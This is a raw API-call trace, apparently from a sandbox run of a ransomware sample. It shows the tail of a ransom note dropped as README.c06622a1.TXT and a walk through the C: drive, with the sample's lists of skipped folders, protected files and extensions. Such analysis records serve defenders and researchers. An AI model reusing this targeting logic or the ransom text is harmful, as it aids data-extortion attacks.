9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0149.088] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.089] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32f2bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32f2bc*=0x7ca, lpOverlapped=0x0) returned 1 [0149.090] CloseHandle (hObject=0x1c) returned 1 [0149.091] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\" (normalized: "c:")) returned 0x16 [0149.091] PathAddBackslashW (in: pszPath="\\\\?\\C:\\" | out: pszPath="\\\\?\\C:\\") returned="" [0149.091] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0149.092] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\*", fInfoLevelId=0x0, lpFindFileData=0x32f51c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f51c) returned 0x152ed8 [0149.092] _wcsicmp (_Str1="$recycle.bin", _Str2="$Recycle.Bin") returned 0 [0149.092] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0149.092] _wcsicmp (_Str1="$recycle.bin", _Str2="Boot") returned -62 [0149.092] wcslen (_String="$recycle.bin") returned 0xc [0149.092] _wcsicmp (_Str1="config.msi", _Str2="Boot") returned 1 [0149.092] wcslen (_String="config.msi") returned 0xa [0149.092] _wcsicmp (_Str1="$windows.~bt", _Str2="Boot") returned -62 [0149.092] wcslen (_String="$windows.~bt") returned 0xc [0149.092] _wcsicmp (_Str1="$windows.~ws", _Str2="Boot") returned -62 [0149.092] wcslen (_String="$windows.~ws") returned 0xc [0149.092] _wcsicmp (_Str1="windows", _Str2="Boot") returned 21 [0149.092] wcslen (_String="windows") returned 0x7 [0149.093] _wcsicmp (_Str1="appdata", _Str2="Boot") returned -1 [0149.093] wcslen (_String="appdata") returned 0x7 [0149.093] _wcsicmp (_Str1="application data", _Str2="Boot") returned -1 [0149.093] wcslen (_String="application data") returned 0x10 [0149.093] _wcsicmp (_Str1="boot", _Str2="Boot") returned 0 [0149.093] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0149.093] _wcsicmp (_Str1="bootmgr", _Str2="README.c06622a1.TXT") returned -16 [0149.093] wcsstr (_Str="bootmgr", _SubStr="README") returned 0x0 [0149.093] _wcsicmp (_Str1="autorun.inf", _Str2="bootmgr") returned -1 [0149.093] wcslen (_String="autorun.inf") returned 0xb [0149.093] _wcsicmp (_Str1="boot.ini", _Str2="bootmgr") returned -63 [0149.093] wcslen (_String="boot.ini") returned 0x8 [0149.093] _wcsicmp (_Str1="bootfont.bin", _Str2="bootmgr") returned -7 [0149.093] wcslen (_String="bootfont.bin") returned 0xc [0149.093] _wcsicmp (_Str1="bootsect.bak", _Str2="bootmgr") returned 6 [0149.093] wcslen (_String="bootsect.bak") returned 0xc [0149.093] _wcsicmp (_Str1="desktop.ini", _Str2="bootmgr") returned 2 [0149.093] wcslen (_String="desktop.ini") returned 0xb [0149.093] _wcsicmp (_Str1="iconcache.db", _Str2="bootmgr") returned 7 [0149.093] wcslen (_String="iconcache.db") returned 0xc [0149.093] _wcsicmp (_Str1="ntldr", _Str2="bootmgr") returned 12 [0149.093] wcslen (_String="ntldr") returned 0x5 [0149.093] _wcsicmp (_Str1="ntuser.dat", _Str2="bootmgr") returned 12 [0149.093] wcslen (_String="ntuser.dat") returned 0xa [0149.093] _wcsicmp (_Str1="ntuser.dat.log", _Str2="bootmgr") returned 12 [0149.093] wcslen (_String="ntuser.dat.log") returned 0xe [0149.093] _wcsicmp (_Str1="ntuser.ini", _Str2="bootmgr") returned 12 [0149.093] wcslen (_String="ntuser.ini") returned 0xa [0149.093] _wcsicmp (_Str1="thumbs.db", _Str2="bootmgr") returned 18 [0149.093] wcslen (_String="thumbs.db") returned 0x9 [0149.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\" (normalized: "c:")) returned 0x16 [0149.094] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x18efe0 [0149.094] wcscpy (in: _Dest=0x18efe0, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0149.094] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0149.094] wcscpy (in: _Dest=0x18efee, _Source="bootmgr" | out: _Dest="bootmgr") returned="bootmgr" [0149.094] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x80) returned 1 [0149.094] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.094] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x18efe0) returned 1 [0149.094] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0149.095] _wcsicmp (_Str1="BOOTSECT.BAK", _Str2="README.c06622a1.TXT") returned -16 [0149.095] wcsstr (_Str="BOOTSECT.BAK", _SubStr="README") returned 0x0 [0149.095] _wcsicmp (_Str1="autorun.inf", _Str2="BOOTSECT.BAK") returned -1 [0149.095] wcslen (_String="autorun.inf") returned 0xb [0149.095] _wcsicmp (_Str1="boot.ini", _Str2="BOOTSECT.BAK") returned -69 [0149.095] wcslen (_String="boot.ini") returned 0x8 [0149.095] _wcsicmp (_Str1="bootfont.bin", _Str2="BOOTSECT.BAK") returned -13 [0149.095] wcslen (_String="bootfont.bin") returned 0xc [0149.095] _wcsicmp (_Str1="bootsect.bak", _Str2="BOOTSECT.BAK") returned 0 [0149.095] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0149.095] _wcsicmp (_Str1="$recycle.bin", _Str2="Config.Msi") returned -63 [0149.095] wcslen (_String="$recycle.bin") returned 0xc [0149.095] _wcsicmp (_Str1="config.msi", _Str2="Config.Msi") returned 0 [0149.095] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0149.095] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0149.095] _wcsicmp (_Str1="hiberfil.sys", _Str2="README.c06622a1.TXT") returned -10 [0149.095] wcsstr (_Str="hiberfil.sys", _SubStr="README") returned 0x0 [0149.095] _wcsicmp (_Str1="autorun.inf", _Str2="hiberfil.sys") returned -7 [0149.095] wcslen (_String="autorun.inf") returned 0xb [0149.095] _wcsicmp (_Str1="boot.ini", _Str2="hiberfil.sys") returned -6 [0149.095] wcslen (_String="boot.ini") returned 0x8 [0149.095] _wcsicmp (_Str1="bootfont.bin", _Str2="hiberfil.sys") returned -6 [0149.095] wcslen (_String="bootfont.bin") returned 0xc [0149.095] _wcsicmp (_Str1="bootsect.bak", _Str2="hiberfil.sys") returned -6 [0149.095] wcslen (_String="bootsect.bak") returned 0xc [0149.095] _wcsicmp (_Str1="desktop.ini", _Str2="hiberfil.sys") returned -4 [0149.095] wcslen (_String="desktop.ini") returned 0xb [0149.095] _wcsicmp (_Str1="iconcache.db", _Str2="hiberfil.sys") returned 1 [0149.095] wcslen (_String="iconcache.db") returned 0xc [0149.095] _wcsicmp (_Str1="ntldr", _Str2="hiberfil.sys") returned 6 [0149.096] wcslen (_String="ntldr") returned 0x5 [0149.096] _wcsicmp (_Str1="ntuser.dat", _Str2="hiberfil.sys") returned 6 [0149.096] wcslen (_String="ntuser.dat") returned 0xa [0149.096] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hiberfil.sys") returned 6 [0149.096] wcslen (_String="ntuser.dat.log") returned 0xe [0149.096] _wcsicmp (_Str1="ntuser.ini", _Str2="hiberfil.sys") returned 6 [0149.096] wcslen (_String="ntuser.ini") returned 0xa [0149.096] _wcsicmp (_Str1="thumbs.db", _Str2="hiberfil.sys") returned 12 [0149.096] wcslen (_String="thumbs.db") returned 0x9 [0149.096] _wcsicmp (_Str1="386", _Str2="sys") returned -64 [0149.096] wcslen (_String="386") returned 0x3 [0149.096] _wcsicmp (_Str1="adv", _Str2="sys") returned -18 [0149.096] wcslen (_String="adv") returned 0x3 [0149.096] _wcsicmp (_Str1="ani", _Str2="sys") returned -18 [0149.096] wcslen (_String="ani") returned 0x3 [0149.096] _wcsicmp (_Str1="bat", _Str2="sys") returned -17 [0149.096] wcslen (_String="bat") returned 0x3 [0149.096] _wcsicmp (_Str1="bin", _Str2="sys") returned -17 [0149.096] wcslen (_String="bin") returned 0x3 [0149.096] _wcsicmp (_Str1="cab", _Str2="sys") returned -16 [0149.096] wcslen (_String="cab") returned 0x3 [0149.096] _wcsicmp (_Str1="cmd", _Str2="sys") returned -16 [0149.096] wcslen (_String="cmd") returned 0x3 [0149.096] _wcsicmp (_Str1="com", _Str2="sys") returned -16 [0149.096] wcslen (_String="com") returned 0x3 [0149.096] _wcsicmp (_Str1="cpl", _Str2="sys") returned -16 [0149.096] wcslen (_String="cpl") returned 0x3 [0149.096] _wcsicmp (_Str1="cur", _Str2="sys") returned -16 [0149.096] wcslen (_String="cur") returned 0x3 [0149.096] _wcsicmp (_Str1="deskthemepack", _Str2="sys") returned -15 [0149.096] wcslen (_String="deskthemepack") returned 0xd [0149.097] _wcsicmp (_Str1="diagcab", _Str2="sys") returned -15 [0149.097] wcslen (_String="diagcab") returned 0x7 [0149.097] _wcsicmp (_Str1="diagcfg", _Str2="sys") returned -15 [0149.097] wcslen (_String="diagcfg") returned 0x7 [0149.097] _wcsicmp (_Str1="diagpkg", _Str2="sys") returned -15 [0149.097] wcslen (_String="diagpkg") returned 0x7 [0149.097] _wcsicmp (_Str1="dll", _Str2="sys") returned -15 [0149.097] wcslen (_String="dll") returned 0x3 [0149.097] _wcsicmp (_Str1="drv", _Str2="sys") returned -15 [0149.097] wcslen (_String="drv") returned 0x3 [0149.097] _wcsicmp (_Str1="exe", _Str2="sys") returned -14 [0149.097] wcslen (_String="exe") returned 0x3 [0149.097] _wcsicmp (_Str1="hlp", _Str2="sys") returned -11 [0149.097] wcslen (_String="hlp") returned 0x3 [0149.097] _wcsicmp (_Str1="icl", _Str2="sys") returned -10 [0149.097] wcslen (_String="icl") returned 0x3 [0149.097] _wcsicmp (_Str1="icns", _Str2="sys") returned -10 [0149.097] wcslen (_String="icns") returned 0x4 [0149.097] _wcsicmp (_Str1="ico", _Str2="sys") returned -10 [0149.097] wcslen (_String="ico") returned 0x3 [0149.097] _wcsicmp (_Str1="ics", _Str2="sys") returned -10 [0149.097] wcslen (_String="ics") returned 0x3 [0149.097] _wcsicmp (_Str1="idx", _Str2="sys") returned -10 [0149.097] wcslen (_String="idx") returned 0x3 [0149.097] _wcsicmp (_Str1="ldf", _Str2="sys") returned -7 [0149.097] wcslen (_String="ldf") returned 0x3 [0149.097] _wcsicmp (_Str1="lnk", _Str2="sys") returned -7 [0149.097] wcslen (_String="lnk") returned 0x3 [0149.097] _wcsicmp (_Str1="mod", _Str2="sys") returned -6 [0149.098] wcslen (_String="mod") returned 0x3 [0149.098] _wcsicmp (_Str1="mpa", _Str2="sys") returned -6 [0149.098] wcslen (_String="mpa") returned 0x3 [0149.098] _wcsicmp (_Str1="msc", _Str2="sys") returned -6 [0149.098] wcslen (_String="msc") returned 0x3 [0149.098] _wcsicmp (_Str1="msp", _Str2="sys") returned -6 [0149.098] wcslen (_String="msp") returned 0x3 [0149.098] _wcsicmp (_Str1="msstyles", _Str2="sys") returned -6 [0149.098] wcslen (_String="msstyles") returned 0x8 [0149.098] _wcsicmp (_Str1="msu", _Str2="sys") returned -6 [0149.098] wcslen (_String="msu") returned 0x3 [0149.098] _wcsicmp (_Str1="nls", _Str2="sys") returned -5 [0149.098] wcslen (_String="nls") returned 0x3 [0149.098] _wcsicmp (_Str1="nomedia", _Str2="sys") returned -5 [0149.098] wcslen (_String="nomedia") returned 0x7 [0149.098] _wcsicmp (_Str1="ocx", _Str2="sys") returned -4 [0149.098] wcslen (_String="ocx") returned 0x3 [0149.098] _wcsicmp (_Str1="prf", _Str2="sys") returned -3 [0149.098] wcslen (_String="prf") returned 0x3 [0149.098] _wcsicmp (_Str1="ps1", _Str2="sys") returned -3 [0149.098] wcslen (_String="ps1") returned 0x3 [0149.098] _wcsicmp (_Str1="rom", _Str2="sys") returned -1 [0149.098] wcslen (_String="rom") returned 0x3 [0149.098] _wcsicmp (_Str1="rtp", _Str2="sys") returned -1 [0149.098] wcslen (_String="rtp") returned 0x3 [0149.098] _wcsicmp (_Str1="scr", _Str2="sys") returned -22 [0149.098] wcslen (_String="scr") returned 0x3 [0149.098] _wcsicmp (_Str1="shs", _Str2="sys") returned -17 [0149.098] wcslen (_String="shs") returned 0x3 [0149.099] _wcsicmp (_Str1="spl", _Str2="sys") returned -9 [0149.099] wcslen (_String="spl") returned 0x3 [0149.099] _wcsicmp (_Str1="sys", _Str2="sys") returned 0 [0149.099] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0149.099] _wcsicmp (_Str1="$recycle.bin", _Str2="MSOCache") returned -73 [0149.099] wcslen (_String="$recycle.bin") returned 0xc [0149.099] _wcsicmp (_Str1="config.msi", _Str2="MSOCache") returned -10 [0149.099] wcslen (_String="config.msi") returned 0xa [0149.099] _wcsicmp (_Str1="$windows.~bt", _Str2="MSOCache") returned -73 [0149.099] wcslen (_String="$windows.~bt") returned 0xc [0149.099] _wcsicmp (_Str1="$windows.~ws", _Str2="MSOCache") returned -73 [0149.099] wcslen (_String="$windows.~ws") returned 0xc [0149.099] _wcsicmp (_Str1="windows", _Str2="MSOCache") returned 10 [0149.099] wcslen (_String="windows") returned 0x7 [0149.099] _wcsicmp (_Str1="appdata", _Str2="MSOCache") returned -12 [0149.099] wcslen (_String="appdata") returned 0x7 [0149.099] _wcsicmp (_Str1="application data", _Str2="MSOCache") returned -12 [0149.099] wcslen (_String="application data") returned 0x10 [0149.099] _wcsicmp (_Str1="boot", _Str2="MSOCache") returned -11 [0149.099] wcslen (_String="boot") returned 0x4 [0149.099] _wcsicmp (_Str1="google", _Str2="MSOCache") returned -6 [0149.099] wcslen (_String="google") returned 0x6 [0149.099] _wcsicmp (_Str1="mozilla", _Str2="MSOCache") returned -4 [0149.099] wcslen (_String="mozilla") returned 0x7 [0149.099] _wcsicmp (_Str1="program files", _Str2="MSOCache") returned 3 [0149.099] wcslen (_String="program files") returned 0xd [0149.099] _wcsicmp (_Str1="program files (x86)", _Str2="MSOCache") returned 3 [0149.099] wcslen (_String="program files (x86)") returned 0x13 [0149.099] _wcsicmp (_Str1="programdata", _Str2="MSOCache") returned 3 [0149.099] wcslen (_String="programdata") returned 0xb [0149.099] _wcsicmp (_Str1="system volume information", _Str2="MSOCache") returned 6 [0149.100] wcslen (_String="system volume information") returned 0x19 [0149.100] _wcsicmp (_Str1="tor browser", _Str2="MSOCache") returned 7 [0149.100] wcslen (_String="tor browser") returned 0xb [0149.100] _wcsicmp (_Str1="windows.old", _Str2="MSOCache") returned 10 [0149.100] wcslen (_String="windows.old") returned 0xb [0149.100] _wcsicmp (_Str1="intel", _Str2="MSOCache") returned -4 [0149.100] wcslen (_String="intel") returned 0x5 [0149.100] _wcsicmp (_Str1="msocache", _Str2="MSOCache") returned 0 [0149.100] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0149.100] _wcsicmp (_Str1="pagefile.sys", _Str2="README.c06622a1.TXT") returned -2 [0149.100] wcsstr (_Str="pagefile.sys", _SubStr="README") returned 0x0 [0149.100] _wcsicmp (_Str1="autorun.inf", _Str2="pagefile.sys") returned -15 [0149.100] wcslen (_String="autorun.inf") returned 0xb [0149.100] _wcsicmp (_Str1="boot.ini", _Str2="pagefile.sys") returned -14 [0149.100] wcslen (_String="boot.ini") returned 0x8 [0149.100] _wcsicmp (_Str1="bootfont.bin", _Str2="pagefile.sys") returned -14 [0149.100] wcslen (_String="bootfont.bin") returned 0xc [0149.100] _wcsicmp (_Str1="bootsect.bak", _Str2="pagefile.sys") returned -14 [0149.100] wcslen (_String="bootsect.bak") returned 0xc [0149.100] _wcsicmp (_Str1="desktop.ini", _Str2="pagefile.sys") returned -12 [0149.100] wcslen (_String="desktop.ini") returned 0xb [0149.100] _wcsicmp (_Str1="iconcache.db", _Str2="pagefile.sys") returned -7 [0149.100] wcslen (_String="iconcache.db") returned 0xc [0149.100] _wcsicmp (_Str1="ntldr", _Str2="pagefile.sys") returned -2 [0149.100] wcslen (_String="ntldr") returned 0x5 [0149.100] _wcsicmp (_Str1="ntuser.dat", _Str2="pagefile.sys") returned -2 [0149.100] wcslen (_String="ntuser.dat") returned 0xa [0149.100] _wcsicmp (_Str1="ntuser.dat.log", _Str2="pagefile.sys") returned -2 [0149.100] wcslen (_String="ntuser.dat.log") returned 0xe [0149.100] _wcsicmp (_Str1="ntuser.ini", _Str2="pagefile.sys") returned -2 [0149.100] wcslen (_String="ntuser.ini") returned 0xa [0149.100] _wcsicmp (_Str1="thumbs.db", _Str2="pagefile.sys") returned 4 [0149.100] wcslen (_String="thumbs.db") returned 0x9 [0149.100] _wcsicmp (_Str1="386", _Str2="sys") returned -64 [0149.101] wcslen (_String="386") returned 0x3 [0149.101] _wcsicmp (_Str1="adv", _Str2="sys") returned -18 [0149.101] wcslen (_String="adv") returned 0x3 [0149.101] _wcsicmp (_Str1="ani", _Str2="sys") returned -18 [0149.101] wcslen (_String="ani") returned 0x3 [0149.101] _wcsicmp (_Str1="bat", _Str2="sys") returned -17 [0149.101] wcslen (_String="bat") returned 0x3 [0149.101] _wcsicmp (_Str1="bin", _Str2="sys") returned -17 [0149.101] wcslen (_String="bin") returned 0x3 [0149.101] _wcsicmp (_Str1="cab", _Str2="sys") returned -16 [0149.101] wcslen (_String="cab") returned 0x3 [0149.101] _wcsicmp (_Str1="cmd", _Str2="sys") returned -16 [0149.101] wcslen (_String="cmd") returned 0x3 [0149.101] _wcsicmp (_Str1="com", _Str2="sys") returned -16 [0149.101] wcslen (_String="com") returned 0x3 [0149.101] _wcsicmp (_Str1="cpl", _Str2="sys") returned -16 [0149.101] wcslen (_String="cpl") returned 0x3 [0149.101] _wcsicmp (_Str1="cur", _Str2="sys") returned -16 [0149.101] wcslen (_String="cur") returned 0x3 [0149.101] _wcsicmp (_Str1="deskthemepack", _Str2="sys") returned -15 [0149.101] wcslen (_String="deskthemepack") returned 0xd [0149.101] _wcsicmp (_Str1="diagcab", _Str2="sys") returned -15 [0149.101] wcslen (_String="diagcab") returned 0x7 [0149.101] _wcsicmp (_Str1="diagcfg", _Str2="sys") returned -15 [0149.101] wcslen (_String="diagcfg") returned 0x7 [0149.101] _wcsicmp (_Str1="diagpkg", _Str2="sys") returned -15 [0149.101] wcslen (_String="diagpkg") returned 0x7 [0149.101] _wcsicmp (_Str1="dll", _Str2="sys") returned -15 [0149.101] wcslen (_String="dll") returned 0x3 [0149.101] _wcsicmp (_Str1="drv", _Str2="sys") returned -15 [0149.101] wcslen (_String="drv") returned 0x3 [0149.101] _wcsicmp (_Str1="exe", _Str2="sys") returned -14 [0149.101] wcslen (_String="exe") returned 0x3 [0149.101] _wcsicmp (_Str1="hlp", _Str2="sys") returned -11 [0149.101] wcslen (_String="hlp") returned 0x3 [0149.101] _wcsicmp (_Str1="icl", _Str2="sys") returned -10 [0149.102] wcslen (_String="icl") returned 0x3 [0149.102] _wcsicmp (_Str1="icns", _Str2="sys") returned -10 [0149.102] wcslen (_String="icns") returned 0x4 [0149.102] _wcsicmp (_Str1="ico", _Str2="sys") returned -10 [0149.102] wcslen (_String="ico") returned 0x3 [0149.102] _wcsicmp (_Str1="ics", _Str2="sys") returned -10 [0149.102] wcslen (_String="ics") returned 0x3 [0149.102] _wcsicmp (_Str1="idx", _Str2="sys") returned -10 [0149.102] wcslen (_String="idx") returned 0x3 [0149.102] _wcsicmp (_Str1="ldf", _Str2="sys") returned -7 [0149.102] wcslen (_String="ldf") returned 0x3 [0149.102] _wcsicmp (_Str1="lnk", _Str2="sys") returned -7 [0149.102] wcslen (_String="lnk") returned 0x3 [0149.102] _wcsicmp (_Str1="mod", _Str2="sys") returned -6 [0149.102] wcslen (_String="mod") returned 0x3 [0149.102] _wcsicmp (_Str1="mpa", _Str2="sys") returned -6 [0149.102] wcslen (_String="mpa") returned 0x3 [0149.102] _wcsicmp (_Str1="msc", _Str2="sys") returned -6 [0149.102] wcslen (_String="msc") returned 0x3 [0149.102] _wcsicmp (_Str1="msp", _Str2="sys") returned -6 [0149.102] wcslen (_String="msp") returned 0x3 [0149.102] _wcsicmp (_Str1="msstyles", _Str2="sys") returned -6 [0149.102] wcslen (_String="msstyles") returned 0x8 [0149.102] _wcsicmp (_Str1="msu", _Str2="sys") returned -6 [0149.102] wcslen (_String="msu") returned 0x3 [0149.102] _wcsicmp (_Str1="nls", _Str2="sys") returned -5 [0149.102] wcslen (_String="nls") returned 0x3 [0149.102] _wcsicmp (_Str1="nomedia", _Str2="sys") returned -5 [0149.102] wcslen (_String="nomedia") returned 0x7 [0149.102] _wcsicmp (_Str1="ocx", _Str2="sys") returned -4 [0149.102] wcslen (_String="ocx") returned 0x3 [0149.102] _wcsicmp (_Str1="prf", _Str2="sys") returned -3 [0149.102] wcslen (_String="prf") returned 0x3 [0149.103] _wcsicmp (_Str1="ps1", _Str2="sys") returned -3 [0149.103] wcslen (_String="ps1") returned 0x3 [0149.103] _wcsicmp (_Str1="rom", _Str2="sys") returned -1 [0149.103] wcslen (_String="rom") returned 0x3 [0149.103] _wcsicmp (_Str1="rtp", _Str2="sys") returned -1 [0149.103] wcslen (_String="rtp") returned 0x3 [0149.103] _wcsicmp (_Str1="scr", _Str2="sys") returned -22 [0149.103] wcslen (_String="scr") returned 0x3 [0149.103] _wcsicmp (_Str1="shs", _Str2="sys") returned -17 [0149.103] wcslen (_String="shs") returned 0x3 [0149.103] _wcsicmp (_Str1="spl", _Str2="sys") returned -9 [0149.103] wcslen (_String="spl") returned 0x3 [0149.103] _wcsicmp (_Str1="sys", _Str2="sys") returned 0 [0149.103] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0149.103] _wcsicmp (_Str1="$recycle.bin", _Str2="PerfLogs") returned -76 [0149.103] wcslen (_String="$recycle.bin") returned 0xc [0149.103] _wcsicmp (_Str1="config.msi", _Str2="PerfLogs") returned -13 [0149.103] wcslen (_String="config.msi") returned 0xa [0149.103] _wcsicmp (_Str1="$windows.~bt", _Str2="PerfLogs") returned -76 [0149.103] wcslen (_String="$windows.~bt") returned 0xc [0149.103] _wcsicmp (_Str1="$windows.~ws", _Str2="PerfLogs") returned -76 [0149.103] wcslen (_String="$windows.~ws") returned 0xc [0149.103] _wcsicmp (_Str1="windows", _Str2="PerfLogs") returned 7 [0149.103] wcslen (_String="windows") returned 0x7 [0149.103] _wcsicmp (_Str1="appdata", _Str2="PerfLogs") returned -15 [0149.103] wcslen (_String="appdata") returned 0x7 [0149.103] _wcsicmp (_Str1="application data", _Str2="PerfLogs") returned -15 [0149.103] wcslen (_String="application data") returned 0x10 [0149.103] _wcsicmp (_Str1="boot", _Str2="PerfLogs") returned -14 [0149.103] 